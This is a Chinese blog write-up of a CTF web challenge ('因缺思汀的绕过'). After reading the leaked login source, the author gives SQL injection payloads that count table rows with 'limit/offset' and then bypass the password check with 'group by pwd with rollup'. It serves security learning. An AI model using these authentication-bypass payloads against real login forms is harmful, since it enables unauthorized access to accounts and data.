实验吧-因缺思厅的绕过writeup

最新推荐文章于 2019-05-01 16:10:00 发布
最新推荐文章于 2019-05-01 16:10:00 发布
阅读量668 收藏
点赞数
分类专栏: CTF

实验吧-因缺思汀的绕过WriteUp

题目地址:http://www.shiyanbar.com/ctf/1940

审计网页代码,发现有一个注释:<!--source: source.txt-->
访问同目录下的source.txt
发现登陆的逻辑代码,下面就可以针对它进行绕过。!
登陆逻辑代码
这里有三层限制

0X00

在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如果输入了filter里面的语句,网页返回“水可载舟,亦可赛艇!”

0X01

第二层是限制从数据库返回的数据必须是一行,在满足第一层条件的情况下可以使用 limit 的返回来确定数据库中总共有几行数据。
注意它的查询语句是 select * from interest where uname = ‘{$_POST[‘uname’]}’于是构造:

1' or 1 limit 1 offset 0#
   
   
  • 1
1' or 1 limit 1 offset 1#
   
   
  • 1
1' or 1 limit 1 offset 2# 
   
   
  • 1

发现2#时返回“一颗赛艇!” 其他都是“亦可赛艇!”———–说明数据库只有两条信息

0X02

接下来想办法绕过第三层,这里是个if判断,只要为true 就可以过,于是可以利用group by with rollup来绕过,group by with rollup会在统计后的产生一条null信息,然后在pwd里不写值,if就为true了。

payload:1' or 1 group by pwd with rollup limit 1 offset 2#

   
   
  • 1
  • 2
flag:CTF{with_rollup_interesting}
   
   
  • 1
怀念_过去
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验writeup Web方向
08-27
就是实验吧的一些writeup,,因缺思厅绕过,让我进去,上传绕过, dvwa,简单的sql注入3
实验吧-因缺思汀的绕过WriteUp
焚卷觅光的博客
07-22 3060
实验吧-因缺思汀的绕过WriteUp题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt--> 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过。! 这里有三层限制0X00在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如
实验吧-因缺思汀的绕过
一个安全研究员
07-21 493
如题
因缺思厅绕过
weixin_30457881的博客
03-19 66
看一下页面源码,看到source.txt。所以进入同目录下的source.txt 代码审计下,并且百度了一些函数。过滤了很多关键字,因此常规的SQL注入没有头绪。想了挺久,因为要满足三个条件。1:不能输入过滤的关键字2:只能返回一行数据3:并且输入的密码与返回的一行数据中的pwd一样才 print"CTF{xxxxxx}"。所以看了下大佬们的WP,学到了with rollup的语法。详细的讲...
因缺思汀的绕过(CTF)
qq_22192367的博客
03-26 487
题目链接:http://ctf5.shiyanbar.com/web/pcat/index.php 老规矩,先看源码,发现可以看到后台代码; 打开进行代码审计,关键代码如下: 代码大意:关键字过滤;第二部分代码从数据库中取出uname,确保取出的数据 只有一行,最后取出的pwd与提交的pwd相比较,相同则输出flag; 思路:利用group by pwd with rollu...
2022HFCTF-线上赛官方Writeup1
08-04
在HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
2020-纵横杯-Writeup.pdf
03-15
2020年纵横杯CTF比赛Writeup 高清PDF版
PML-Prediction-Assignment-Writeup
05-31
在本项目中,“PML-Prediction-Assignment-Writeup-main”可能包含用于建模的数据集。 2. 数据预处理:数据预处理是任何建模任务的关键步骤,包括数据清洗(处理缺失值和异常值)、数据转换(如归一化或标准化)...
实验吧1867 writeup
10-24
实验吧1867-困在栅栏里的凯撒的解题思路和过程
[实验吧](web)因缺思厅绕过 源码审计绕过
weixin_30325793的博客
07-08 87
0x00 直接看源码吧 早上写了个注入fuzz的脚本,无聊回到实验吧的题目进行测试,发现了这道题 地址:http://ctf5.shiyanbar.com/web/pcat/index.php 分析如下: 1. 看过滤,过滤了一些查询关键词,明注是不可能了,过滤括号,通常的盲注也是实现不了。 2. 看要得到flag的条件,我们输入的密码和查询的密码要一致,而且查询结果只能有一条。...
实验因缺思汀的绕过
windseraph2的博客
05-13 500
解题连接http://ctf5.shiyanbar.com/web/pcat/index.php  查看源代码   action="" method="post"><input name="uname" type="text"/><input name="pwd" type="text"/><input type="submit" /> 查
CTF-实验因缺思汀的绕过
才不是小弱鸡的博客
05-07 480
web题嘛,第一步肯定是看源码。f12后发现这样一些奇怪的东东接下来肯定是打开这个文件嘛打开后就看到了php源码啦(是不是很开心!)分析一下源码可以看到这里过滤了一些sql语句(嗯,这些东西接下来不能用了)这里的意思大概是选择操作的数据库为db(数据库看不到QAQ)然后将咱们输入的uname在数据库查询uname和key,再将key和咱们输入的pwd比对,相等就打印flag。然后就要用一个注入的小...
因缺思汀的绕过
Gunther的博客
08-18 597
http://www.shiyanbar.com/ctf/1940 因缺思汀的绕过 访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入,XSS等相关知识。涉及方向较多。 此题主要涉及源码审计,MySQL相关的知识。 flag格式 CTF{
看看笑笑
qinghua392010的专栏
04-27 565
<br />1.面试<br />面试官:熟悉哪种语言?   <br />应聘者:C#   <br /><br />面试官:知道什么叫类么?   <br />应聘者:我这人实在,工作努力,不知道什么叫累。   <br /><br />面试官:知道什么是包?   <br />应聘者:我这人实在,平常不带包,也不用公司准备了。   <br /><br />面试官:知道什么是接口吗?   <br />应聘者:我这个人工作认真,从来不找借口偷懒。   <br /><br />面试官:知道什么是继承么?   <br /
Mp3stego使用,附题,实验吧misc-Canon
weixin_30779691的博客
12-22 803
mp3stego使用:encode -E data.txt -P pass sound.wav sound.mp3 encode -E (里面放要加密的txt信息) -P(密码)(需要将密码放入的wav文件)(生产的mp3文件)        decode -X -P pass sound.mp3 decode -X -P (密码) (要解密的文件),要解密的文件需...
实验吧之Canon
weixin_30784501的博客
05-01 122
解压zip文件得到一个mp3文件和一个zip压缩包,解压需要密码,那密码就在mp3里面,使用MO3Stego好像不能解析出文本,说明解析需要密码,此时通过网上的讨论说标题Canon就是密码,就试着用了Decode.exe -X -P 123456 test.mp3(其中123456是密码),结果解析出了一个文本pqiem*zoei$%h,当然这串字符就是解压缩包的密码。 之后得到一个名为p...
实验因缺思汀的绕过 By Assassin(with rollup统计)
Assassin
01-29 7284
这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!<?php error_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值